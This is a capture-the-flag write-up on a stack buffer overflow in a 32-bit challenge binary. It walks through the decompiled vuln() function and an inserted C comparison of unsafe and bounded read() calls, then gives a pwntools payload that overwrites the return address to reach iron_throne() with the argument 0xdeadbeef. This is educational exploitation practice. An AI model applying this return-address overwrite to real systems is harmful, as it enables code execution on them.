Author: NightKing
A 32-bit binary has been given.
Decompilation
Looking at the vuln() function:
We see scope for a buffer overflow: read() accepts an input of up to 0x54 bytes, more than the 0x2c bytes allocated for the buffer.
If we read the challenge description it is pretty clear that we have to find the iron throne.
And while decompiling/debugging we see an iron_throne() function.
Aha!
We see that iron_throne() is called with a parameter that is later compared against the number -0x2152411, which translates to 0xdeadbeef.
If that check passes we get the flag via system("cat flag.txt").
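As an added example (not code from the writeup or the challenge binary), here is the read() pattern the decompilation describes next to a bounded version, in C. The sizes 0x2c and 0x54 come from the writeup; the function names and the reconstructed body of vuln() are assumptions.

```c
#include <stddef.h>
#include <string.h>
#include <unistd.h>

/* Sizes taken from the writeup: a 0x2c-byte buffer filled by read() with length 0x54. */
#define BUF_SIZE 0x2c
#define READ_LEN 0x54

/* Assumed shape of vuln(): the length handed to read() is independent of the
 * buffer size. The binary passes the constant READ_LEN, so up to
 * READ_LEN - BUF_SIZE bytes land past the end of buf, over the saved EBP and
 * the return address. Shown for comparison only; nothing below calls it. */
void vuln_unsafe(int fd, size_t len) {
    char buf[BUF_SIZE];
    read(fd, buf, len);          /* overflow whenever len > BUF_SIZE */
}

/* How many bytes a read() of read_len bytes can write past a cap-byte buffer. */
size_t overflow_bytes(size_t read_len, size_t cap) {
    return read_len > cap ? read_len - cap : 0;
}

/* Hardened read: never accept more than cap - 1 bytes and always NUL-terminate,
 * so the length is derived from the buffer rather than chosen separately. */
ssize_t bounded_read(int fd, char *buf, size_t cap) {
    if (cap == 0) return -1;
    ssize_t n = read(fd, buf, cap - 1);
    if (n < 0) return -1;
    buf[n] = '\0';
    return n;
}

/* Push READ_LEN bytes (constructed input) through a pipe into a BUF_SIZE buffer
 * with bounded_read and report how many bytes were actually stored. */
ssize_t demo_bounded(void) {
    int fds[2];
    char input[READ_LEN];
    char buf[BUF_SIZE];
    memset(input, 'a', sizeof input);
    if (pipe(fds) != 0) return -1;
    write(fds[1], input, sizeof input);
    close(fds[1]);
    ssize_t n = bounded_read(fds[0], buf, sizeof buf);
    close(fds[0]);
    return n;                    /* 0x2b: the buffer size minus the terminator */
}
```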
Crafting the exploit
    from pwn import *
    elf = ELF("./<challenge binary>")   # binary name is not given in the writeup

    payload  = b'a' * 44                          # fills the required 0x2c-byte buffer
    payload += b'x' * 12                          # padding needed to reach the saved EIP
    payload += p32(elf.symbols["iron_throne"])    # address of iron_throne()
    payload += p32(0xdeadbeef) + p32(0xdeadbeef)  # iron_throne()'s parameter and return address, both 0xdeadbeef